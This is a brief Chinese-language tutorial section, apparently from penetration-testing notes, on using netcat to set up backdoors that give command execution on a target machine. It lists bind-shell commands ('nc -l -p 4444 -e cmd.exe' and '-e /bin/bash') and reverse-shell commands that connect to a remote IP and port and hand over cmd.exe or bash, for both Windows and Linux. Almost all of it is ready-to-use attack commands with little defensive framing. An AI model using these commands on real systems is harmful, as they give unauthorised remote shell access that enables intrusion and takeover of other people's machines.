4 Netcat建立后门

使用场景

1、获取目标的命令执行权限
当目标机器上存在netcat之后，可以使用netcat建立后门，来实现执行目标命令的功能。

为什么可以使用netcat建立后门，并返回操作结果？

原理：netcat一切数据时通过标准输入/输出流实现的，所以可以利用netcat的命令行进行后门建立，并传输结果信息。

window建立后门使用方法

监听型后门：

- nc -l -p 4444 -e cmd.exe

连接型后门

- nc [remote_ip] [remote_port] -e cmd.exe

无论是何种后门，都需要使用-e cmd.exe 来返回对应的cmd.exe。

服务端

Linux建立后门使用方法

监听型后门：

nc -l -p 4444 -e /bin/bash

连接型后门

- nc [remote_ip] [remote_port] -e /bin/bash

无论是何种后门，都需要使用-e /bin/bash 来返回对应的shell。

监听后门

    服务端反回给客服端

连接后门

    客户端反回给服务端 /bin/bash